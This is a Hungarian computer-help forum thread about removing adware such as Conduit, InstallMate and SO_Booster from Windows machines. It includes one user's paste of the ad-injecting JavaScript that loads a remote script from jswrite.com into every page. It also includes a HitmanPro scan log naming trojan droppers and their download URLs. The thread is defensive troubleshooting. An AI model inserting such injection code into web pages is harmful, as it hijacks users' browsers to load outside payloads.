Keresés

Ha nem jársz a dolog végére, pont ugyanez lesz Krómon is előbb utóbb.

Az pedig hogy a Defendert nem tudod elindítani, aktív kártevőt jelez.

Lecseréltem az FF-et Chromra. Betettem hozzá az ABP-t és reklám mentes béke van. 

Még a róka azért maradt fenn, mert a kedvenceket nem sikerül áttenni. Majd sorba átjön, ami kell és letakarítom. Egye meg a fene.

Talán mert átköltözött felhőbe is.

AZÉRT, mert már nem férek hozzá.

Még az előző megnyitás sikerült.

És köszi a segítséged, már nem kínozom se magam, se mást ezzel a gonddal.

Annak mi lehet az oka, ha a Chrome-ban az előzmények törlése percekig tart akkor is, ha alig van benne valami? Régebben rákattintottam, és pár másodperc alatt törölt mindent. Most meg elhúzza, mint a rétestésztát. 

Már miért ne lehetne?

Az egyéb védelmeket leszeded, aztán bekapcsolod.

Itt:

Bizony az AVG és a Malwi fennmaradt.

DEFENDERT nem lehet bekapcsolni.

Talált egy pár vírust, KARANTÉNba tettem. A rendszerleírokat sem törölni, sem karanténba nem helyezte.

A VÉGE ez lett.

Most egy kis pihi és valamelyik nap telepít.

Most hagy egye ott a fene, ahol van.

Upsz.

Elfelejtettem íni, hogy az eddig feltelepített irtó programokat (A Defender kivételével) mindenképp szedd le.

Egyszerre csak mindig egy legyen a gépen.

Jut eszembe a Defender fent van és engedélyezett? A win tűzfala be van kapcsolva?

Kettő biztosan kukába való.

My free codec
Msxml4 SP2 piller.kft

Viszont ez ingyenes, és hordozható. Érdemes USB drájvról futtatni. http://www.emsisoft.com/en/software/eek/

Még egy próbát talán megér.

Akkor szándékosan zavarják zsenge elmém. :-(

EGY

KETTŐ

HÁROM

Pár nap már elment ezzel a veszedelemmel. Ez már kihívás. (nekem)

Hamarabb lett volna újra telepíteni a gépet, de nehogymá! :-)

Tanulni kell!

Megmondta 5. lenin

Aha. Az nem jelent semmit. Hívhatnák Bélának is. Ez egy kiterjedt "család" más más nevekkel.

Erre gondoltam:

EGY

KETTŐ

Nem használtak: nem takarították el. A maware karanténba rakta, amit talált, a hitman lejárt, átnézte, de nem törölhető vele semmi. A YAC törölt, amit talált.

Ezt most elküldöm, mert..

Képet a programokról mindjárt teszek-

?

Hát izé, szóval mi is 32 bites?

Mit jelent a "nem használtak" ?

Nem ismertek fel kártevőt? Nem jelent meg az összefoglalóban a felismert? Nem volt/ak hajlandóak irtani?

(Azért biztos ami zicher, betehetnél egy/több képet a telepített programok listájáról (attól függően képet vagy képeket, hogy mennyi van) mit lehessen tudni.)

Ahelyett, hogy konkrét ok ismerete nélkül feltételezed, hogy mi a hiba gyökere, mi lenne, ha a conduitot eltávolítanád, és ezzel megkönnyítenéd a saját és a segíteni szándékozó kolléga dolgát is?

Amit a ..023-ban adtál, csak a parancssorosat nem próbáltam. (Strep2)

Talán azért nem használtak, mert mindenütt 32bites van írva, ez meg 64-es?

Már látom, hogy beleütöd az orrom. :-)

Adsz az eltávolításához egy itinert?

De bizony itt van a "kutya elásva".

Az ominózus kiegészítő ugyanis minden böngészőműveletnél beletesz egy scriptet a fejlécbe. Ezt látod te. Nem az eredeti forrást.

De hát persze ahogy gondolod.

Nagyon köszi a segítséget, de sajna nem itt van a kutya elásva.  Szerintem nem a "conduit" a kulcs. Az csak hab a tortán.

Az igazi gáz, hogy az a script részlet megjelenik a forrásban. Ráadásul egyes szavakból kattintható Linket csinál.

Van más ötletetek? Mi csinálhatja ezt?

Te is látod. :-)

Ő az. "InstallMateE"

Valami YAC vírusirtó vakaródzik a gépen kb egy órája és a felénél tart. Reméljük azt a gyökeret kiírtja. (és majd telepít valami mást) Átjöttem a laptopra. Hagy dolgozzon. Majd meglátjuk. Ha már te látod a vírust, akkor biztos tudod azt is, hogy kell agyonverni, ha ez nem falja fel.

Most megyek aludni. Kinézegetek a másik gépre.

Már kíváncsi vagyok. Pár órát már elszutyogtam vele.

'cakát!

http://pcforum.hu/tudastar/95258/Conduit+kereso+eltuntetese+Firefoxbol.html

http://www.techsupportall.com/how-to-remove-conduit-search/

Semmi baj. Érdekes lista, és rajta van a mumus.

Elvileg mind az AdwCleaner, mind a Junkware removal tool, mind a Malwarebytes Anti-Malware  Free, mind a HitmanPro elbánik vele.

Így: http://malwaretips.com/blogs/win32-installmate-ad-pup-removal/

Sziasztok, új vagyok itt és a következö problémával fordulok hozzátok:

A legtöbb weboldalt elárasztották a reklámok, amik szerintem nem a szervertöl jönnek. Ahol megjelenik, ott az oldal tetején egy magát Bing-nek kiadó keresö ablak van, de a search.conduit.com-ra submittál. Ezekben az oldalakban a HTML elejére a következö scriptet itteszti be:

<!doctype html>

<html lang="en">

       <head><script>if(typeof window.__wsujs==='undefined'){window.__wsujs=8978;window.__wsujsn='MediaAds';window.__wsujss='94E8D55330AFC323B94E091B80C64303';} </script>

                                                       <script>if(top == self){

                                                          var zhead = document.getElementsByTagName('head')[0];

                                                          if(!zhead){zhead = document.createElement('head');}

                                                          var qscript = document.createElement('script');

                                                          qscript.setAttribute('id','wsh2_js');

                                                          qscript.setAttribute('src','http://jswrite.com/script1.js');

                                                          qscript.setAttribute('type','text/javascript');qscript.async = true;

                                                          if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript);

                                                      } </script>

aztán innen folytatódik az eredeti HTML. A google sajna csak 4-5 eredményt hozott, de egyiket sem latin betükkel írták. Azért egy-két dolgot kipróbáltam, ezeket megosztom, hátha ötletet ad.

Az otthoni privát IP-ket használó hálózatot egy router köti össze az internettel, amelyik NAT-ol. Befelé csak néhány port lesz forwardolva, pl. a 80-as egy Raspberry-re, ehhez egy noip.me-s domain is lett regisztrálva.

Tehát a tapasztalatok:

1. A hibát csak egy gép produkálja. Ezen WinXP fut.
2. Ezen a gépen a Firefox 30.0, és az IE8-ban is fertözödik.
3. A többi Windows-os és Linux-os gépek nem hibáznak.
4. A google nem fertözödik, az index.hu igen!
5. A Raspberry-n lévö oldalakat ha a privat ip-t beadva nyitom meg akkor nem fertözödik, de ha a noip.me-n keresztül akkor igen!
6. Proxy-t tudatosan sehol nem telepítettem, a Firefox biztos hogy nem is használ.

Hol agaszkodhatott rá valami a Web-kapcsolatomra?

Minden segítséget köszönök

kasza_g

Pofátlan voltam.

Vagy elsüllyed, vagy kitörli a modi.

[code]
HitmanPro 3.7.9.216
www.hitmanpro.com

   Computer name . . . . : FABING-PC
   Windows . . . . . . . : 6.1.1.7601.X64/2
   User name . . . . . . : Fabing-PCFabing
   UAC . . . . . . . . . : Enabled
   License . . . . . . . : Trial (Expired)

   Scan date . . . . . . : 2014-06-20 18:48:41
   Scan mode . . . . . . : Normal
   Scan duration . . . . : 7m 16s
   Disk access mode  . . : Direct disk access (SRB)
   Cloud . . . . . . . . : Internet
   Reboot  . . . . . . . : No

   Threats . . . . . . . : 10
   Traces  . . . . . . . : 21

   Objects scanned . . . : 1 494 233
   Files scanned . . . . : 25 071
   Remnants scanned  . . : 346 195 files / 1 122 967 keys

Malware _____________________________________________________________________

   C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}Custom.dll
      Size . . . . . . . : 93 696 bytes
      Age  . . . . . . . : 5.3 days (2014-06-15 10:46:30)
      Entropy  . . . . . : 6.3
      SHA-256  . . . . . : CF5F78CB97369DC1FB25CF2B5B8DD49B8A6F4EA69055FFC0CE47618C1DC8365D
      Product  . . . . . : MountainApp
      Publisher  . . . . : MountainApp
      Description  . . . : Custom DLL for MountainA
      Version  . . . . . : 2014.6.
      Copyright  . . . . : Copyright © 2014 M
    > Bitdefender  . . . : Gen:Variant.Application.Kazy.365295
    > Kaspersky  . . . . : Trojan.Win32.AntiFW.b
      Fuzzy  . . . . . . : 102.0
      Forensic Cluster
         -38.3s C:ProgramDataMicrosoftMicrosoft AntimalwareScansHistoryResultsResource{68BE7FAF-E6C0-4816-AA52-8229A0582232}
         -38.3s C:ProgramDataMicrosoftMicrosoft AntimalwareScansHistoryResultsResource{68BE7FAF-E6C0-4816-AA52-8229A0582232}
         -37.1s C:Program Files (x86)SO_Booster
         -37.1s C:Program Files (x86)SO_Booster
         -36.4s C:Program Files (x86)SO_BoosterAssistant_x64.dll
         -34.3s C:ProgramDataMicrosoftMicrosoft AntimalwareScansMetaStore276
         -34.3s C:ProgramDataMicrosoftMicrosoft AntimalwareScansMetaStore276728F2CBDFAE70DE8.dat
         -33.5s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5ZAEN1IW86_2_1[1].txt
         -33.5s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5ZAEN1IW86_2_1[1].txt
         -33.5s C:ProgramDataInstallMateE7D82FE0cfg6_2_1.ini
         -33.1s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5KHP0JCY1agup[1].exe
         -27.0s C:ProgramDataMountainApp
         -27.0s C:ProgramDataMountainAppSO_Booster
         -26.9s C:UsersFabingAppDataLocalTempFHVQZS.tmp.app2HTML
         -26.4s C:ProgramDataMountainAppSO_Booster630647097.ini
         -26.4s C:ProgramDataMountainAppSO_Booster630647097.ini
         -26.3s C:ProgramDataMicrosoftMicrosoft AntimalwareScansHistoryResultsResource{4BC5A4A2-E796-4D12-A91C-B8FE24502105}
         -26.2s C:WindowsTasksSO_Booster-S-630647097.job
         -26.2s C:WindowsTasksSO_Booster-S-630647097.job
         -26.0s C:ProgramDataMicrosoftMicrosoft AntimalwareScansHistoryResultsResource{2105C43D-D2CD-4B0A-8157-1C5D18DB5F73}
         -26.0s C:ProgramDataMicrosoftMicrosoft AntimalwareScansHistoryResultsResource{2105C43D-D2CD-4B0A-8157-1C5D18DB5F73}
         -25.9s C:WindowsSystem32TasksSO_Booster-S-630647097
         -25.9s C:WindowsSystem32TasksSO_Booster-S-630647097
         -25.9s C:WindowsSystem32TasksSO_Booster-S-630647097
         -25.9s C:WindowsSystem32TasksSO_Booster-S-630647097
         -25.9s C:WindowsSystem32TasksSO_Booster-S-630647097
         -25.9s C:WindowsSystem32TasksSO_Booster-S-630647097
         -25.9s C:WindowsSystem32TasksSO_Booster-S-630647097
         -24.6s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX6_3[1].txt
         -24.6s C:ProgramDataInstallMateE7D82FE0cfg6_3.ini
         -24.6s C:ProgramDataInstallMateE7D82FE0cfg6_3.ini
         -24.0s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY37[1].txt
         -24.0s C:ProgramDataInstallMateE7D82FE0cfg7.ini
         -23.4s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5ZAEN1IW87_1[1].txt
         -23.4s C:ProgramDataInstallMateE7D82FE0cfg7_1.ini
         -22.8s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5KHP0JCY17_2[1].txt
         -22.8s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5KHP0JCY17_2[1].txt
         -22.8s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5KHP0JCY17_2[1].txt
         -22.8s C:ProgramDataInstallMateE7D82FE0cfg7_2.ini
         -22.2s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX8[1].txt
         -22.2s C:ProgramDataInstallMateE7D82FE0cfg8.ini
         -21.6s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY3Halál_hajnalban_-_A_császár_utolsĂł_hadihajĂłja_(Szent_István_csatahajĂł)[1].mp4
         -21.6s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4
         -21.5s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         -21.5s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         -21.5s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         -21.5s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         -21.5s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         -21.5s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         -21.5s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         -21.5s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         -21.5s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         -21.5s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         -21.5s C:UsersFabingAppDataLocalTempdown.3844.Halál hajnalban - A császár utolsó hadihajója (Szent István csatahajó).mp4.part
         -16.0s C:ProgramDataInstallMate89CC910C
         -16.0s C:ProgramDataInstallMate89CC910C
         -15.2s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         -15.2s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         -15.2s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         -15.2s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         -15.2s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         -15.2s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         -15.2s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         -15.2s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY31[1].txt
         -0.1s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
         -0.1s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
         -0.1s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
         -0.1s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
         -0.1s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
         -0.1s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
         -0.1s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX[1].txt
          0.0s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}
          0.0s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}_Setup.dll
          0.0s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}Setup.ico
          0.0s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}Readme.txt
          0.0s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}Custom.dll
          0.0s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}Setup.exe
          0.0s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}TsuDll.dll
          0.2s C:ProgramDataMountainAppSetup
          0.4s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash3504
          0.4s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash3504
          0.4s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash3504entries
          0.4s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash3504doomed
          0.5s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensionshcyaibp@u-.edu
          0.5s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensionshcyaibp@u-.educontent
          0.7s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensionsdkhb@fdgzvdd.edu
          0.7s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensionsdkhb@fdgzvdd.educontent
          1.1s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
          1.1s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
          1.1s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
          1.1s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
          1.1s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
          1.1s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
          1.1s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
          1.1s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
          1.1s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
          1.1s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
          1.1s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
          1.1s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.orgcontent
          1.1s C:UsersFabingAppDataRoamingMozillaFirefoxProfiles7thcqgix.defaultextensions2vx.hyxa@eoouoa-.org
          2.5s C:ProgramDataInstallMate{37DD48E7-2362-473B-A5D0-6B40EC3E6A11}Setup.dat

   C:ProgramDataInstallMate{D7853FF8-5284-4CC4-AE2F-1AA60C661D0E}Custom.dll
      Size . . . . . . . : 93 696 bytes
      Age  . . . . . . . : 5.3 days (2014-06-15 10:48:03)
      Entropy  . . . . . : 6.3
      SHA-256  . . . . . : CF5F78CB97369DC1FB25CF2B5B8DD49B8A6F4EA69055FFC0CE47618C1DC8365D
      Product  . . . . . : MountainApp
      Publisher  . . . . : MountainApp
      Description  . . . : Custom DLL for MountainA
      Version  . . . . . : 2014.6.
      Copyright  . . . . : Copyright © 2014 M
    > Bitdefender  . . . : Gen:Variant.Application.Kazy.365295
    > Kaspersky  . . . . : Trojan.Win32.AntiFW.b
      Fuzzy  . . . . . . : 102.0
      Forensic Cluster
         -10.3s C:ProgramDataInstallMate49E3098F
         -10.3s C:ProgramDataInstallMate49E3098F
         -10.3s C:ProgramDataInstallMate49E3098F
         -10.3s C:ProgramDataInstallMate49E3098F
         -10.3s C:ProgramDataInstallMate49E3098F
         -10.3s C:ProgramDataInstallMate49E3098F
         -10.3s C:ProgramDataInstallMate49E3098F
         -10.3s C:ProgramDataInstallMate49E3098F
         -10.3s C:ProgramDataInstallMate49E3098F
         -10.3s C:ProgramDataInstallMate49E3098F
         -10.3s C:ProgramDataInstallMate49E3098F
         -10.3s C:ProgramDataInstallMate49E3098F
         -9.6s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5KHP0JCY11[1].txt
         -9.6s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5KHP0JCY11[1].txt
         -9.6s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5KHP0JCY11[1].txt
         -9.0s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEXclipconverter_logo[1].jpg
         -9.0s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEXclipconverter_logo[1].jpg
         -9.0s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEXclipconverter_logo[1].jpg
         -0.1s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5ZAEN1IW8[1].txt
         -0.0s C:ProgramDataInstallMate{D7853FF8-5284-4CC4-AE2F-1AA60C661D0E}
         -0.0s C:ProgramDataInstallMate{D7853FF8-5284-4CC4-AE2F-1AA60C661D0E}
         -0.0s C:ProgramDataInstallMate{D7853FF8-5284-4CC4-AE2F-1AA60C661D0E}_Setup.dll
         -0.0s C:ProgramDataInstallMate{D7853FF8-5284-4CC4-AE2F-1AA60C661D0E}Setup.ico
         -0.0s C:ProgramDataInstallMate{D7853FF8-5284-4CC4-AE2F-1AA60C661D0E}Setup.ico
         -0.0s C:ProgramDataInstallMate{D7853FF8-5284-4CC4-AE2F-1AA60C661D0E}Readme.txt
          0.0s C:ProgramDataInstallMate{D7853FF8-5284-4CC4-AE2F-1AA60C661D0E}Custom.dll
          0.0s C:ProgramDataInstallMate{D7853FF8-5284-4CC4-AE2F-1AA60C661D0E}Setup.exe
          0.0s C:ProgramDataInstallMate{D7853FF8-5284-4CC4-AE2F-1AA60C661D0E}TsuDll.dll
          0.4s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash17076doomed
          0.4s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash17076doomed
          0.4s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash17076entries
          0.4s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash17076entries
          0.4s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash17076entries
          0.4s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash17076entries
          0.4s C:UsersFabingAppDataLocalMozillaFirefoxProfiles7thcqgix.defaultcache2.Trash17076
          0.8s C:ProgramDataInstallMate{D7853FF8-5284-4CC4-AE2F-1AA60C661D0E}Setup.dat
          0.8s C:ProgramDataInstallMate{D7853FF8-5284-4CC4-AE2F-1AA60C661D0E}Setup.dat
          0.8s C:ProgramDataInstallMate{D7853FF8-5284-4CC4-AE2F-1AA60C661D0E}Setup.dat
          2.5s C:ProgramDataMountainAppSO_Booster630647097

   C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEXERjuo9_[1].exe
      Size . . . . . . . : 1 797 352 bytes
      Age  . . . . . . . : 5.3 days (2014-06-15 10:44:53)
      Entropy  . . . . . : 7.9
      SHA-256  . . . . . : 742C0C3645C775F6321562425BB45586DBC8C228D0F5F3AABADC76AE8C7A7D2B
      Product  . . . . . : information
      Publisher  . . . . : DBMS
      Description  . . . : information
      Version  . . . . . : 3.8.0.0
      Copyright  . . . . : Copyright (c) 2014
      RSA Key Size . . . : 2048
      Source URL . . . . : hxxp://getmeegan.info/?e=svon&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=2921&country=HU&ind=6822001593211730907&exid=0&ssd=14078005137440387784&hid=10759681496681907507&osid=601&channel=0&sfx=1&jc=1&category_name=SaveOnLH&install_date=20130615
      Authenticode . . . : Valid
    > Bitdefender  . . . : Gen:Variant.Adware.Dropper.103
    > Kaspersky  . . . . : not-a-virus:HEUR:AdWare.Win32.Agent.heur
      Fuzzy  . . . . . . : 103.0

   C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX9[1].exe
      Size . . . . . . . : 1 721 128 bytes
      Age  . . . . . . . : 5.3 days (2014-06-15 10:44:29)
      Entropy  . . . . . : 7.9
      SHA-256  . . . . . : 7C47F06429ED3CCEA2263DFEB6EA11C0B516382E1B5C165F3978C3179440F93C
      Product  . . . . . : information
      Publisher  . . . . : DBMS
      Description  . . . : information
      Version  . . . . . : 3.8.0.0
      Copyright  . . . . : Copyright (c) 2014
      RSA Key Size . . . : 2048
      Source URL . . . . : hxxp://getmeegan.info/?e=svon&publisher=2921&dd=3&country=HU&ind=6822001593211730907&exid=0&ssd=14078005137440387784&hid=10759681496681907507&osid=601&channel=0&sfx=1&jc=1&utid=3&category_name=SaveOnIE&install_date=20130615
      Authenticode . . . : Valid
    > Bitdefender  . . . : Gen:Variant.Adware.Dropper.103
    > Kaspersky  . . . . : not-a-virus:HEUR:AdWare.Win32.Agent.heur
      Fuzzy  . . . . . . : 103.0

   C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY3tpq[1].exe
      Size . . . . . . . : 4 983 808 bytes
      Age  . . . . . . . : 5.3 days (2014-06-15 10:45:16)
      Entropy  . . . . . : 7.9
      SHA-256  . . . . . : CEA8BB010EABAC08EB71A9573DAC157B690AB613BE580065601C436549F4E755
      Source URL . . . . : hxxp://i1.superstoragemy.com/addons/dfndr/180/tpq.exe
    > Bitdefender  . . . : Gen:Variant.Dropper.99
    > Kaspersky  . . . . : Trojan.Win32.Agent.afsax
      Fuzzy  . . . . . . : 111.0

   C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5KHP0JCY1agup[1].exe
      Size . . . . . . . : 729 600 bytes
      Age  . . . . . . . : 5.3 days (2014-06-15 10:45:56)
      Entropy  . . . . . : 6.9
      SHA-256  . . . . . : F5FBDC74AFC209F2648490E077A2FCDDC402CBC57ABABBC2F735AAECDE95681B
      Description  . . . :  
      Version
      Source URL . . . . : hxxp://i1.superstoragemy.com/addons/agup.exe
    > Bitdefender  . . . : Trojan.Agent.WDCR.C
    > Kaspersky  . . . . : Trojan-Downloader.Win32.Adload.dyhq
      Fuzzy  . . . . . . : 108.0
      Forensic Cluster
         -5.2s C:ProgramDataMicrosoftMicrosoft AntimalwareScansHistoryResultsResource{68BE7FAF-E6C0-4816-AA52-8229A0582232}
         -5.2s C:ProgramDataMicrosoftMicrosoft AntimalwareScansHistoryResultsResource{68BE7FAF-E6C0-4816-AA52-8229A0582232}
         -4.0s C:Program Files (x86)SO_Booster
         -4.0s C:Program Files (x86)SO_Booster
         -3.3s C:Program Files (x86)SO_BoosterAssistant_x64.dll
         -1.2s C:ProgramDataMicrosoftMicrosoft AntimalwareScansMetaStore276
         -1.2s C:ProgramDataMicrosoftMicrosoft AntimalwareScansMetaStore276728F2CBDFAE70DE8.dat
         -0.4s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5ZAEN1IW86_2_1[1].txt
         -0.4s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5ZAEN1IW86_2_1[1].txt
         -0.4s C:ProgramDataInstallMateE7D82FE0cfg6_2_1.ini
          0.0s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5KHP0JCY1agup[1].exe
          6.1s C:ProgramDataMountainApp
          6.1s C:ProgramDataMountainAppSO_Booster
          6.3s C:UsersFabingAppDataLocalTempFHVQZS.tmp.app2HTML
          6.7s C:ProgramDataMountainAppSO_Booster630647097.ini
          6.7s C:ProgramDataMountainAppSO_Booster630647097.ini
          6.8s C:ProgramDataMicrosoftMicrosoft AntimalwareScansHistoryResultsResource{4BC5A4A2-E796-4D12-A91C-B8FE24502105}
          7.0s C:WindowsTasksSO_Booster-S-630647097.job
          7.0s C:WindowsTasksSO_Booster-S-630647097.job
          7.2s C:ProgramDataMicrosoftMicrosoft AntimalwareScansHistoryResultsResource{2105C43D-D2CD-4B0A-8157-1C5D18DB5F73}
          7.2s C:ProgramDataMicrosoftMicrosoft AntimalwareScansHistoryResultsResource{2105C43D-D2CD-4B0A-8157-1C5D18DB5F73}
          7.2s C:WindowsSystem32TasksSO_Booster-S-630647097
          7.2s C:WindowsSystem32TasksSO_Booster-S-630647097
          7.2s C:WindowsSystem32TasksSO_Booster-S-630647097
          7.2s C:WindowsSystem32TasksSO_Booster-S-630647097
          7.2s C:WindowsSystem32TasksSO_Booster-S-630647097
          7.2s C:WindowsSystem32TasksSO_Booster-S-630647097
          7.2s C:WindowsSystem32TasksSO_Booster-S-630647097
          8.6s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE54ABWKMEX6_3[1].txt
          8.6s C:ProgramDataInstallMateE7D82FE0cfg6_3.ini
          8.6s C:ProgramDataInstallMateE7D82FE0cfg6_3.ini
          9.1s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE560M27OY37[1].txt
          9.1s C:ProgramDataInstallMateE7D82FE0cfg7.ini
          9.7s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5ZAEN1IW87_1[1].txt
          9.7s C:ProgramDataInstallMateE7D82FE0cfg7_1.ini
         10.3s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5KHP0JCY17_2[1].txt
         10.3s C:UsersFabingAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5KHP0JCY17_2[1].txt
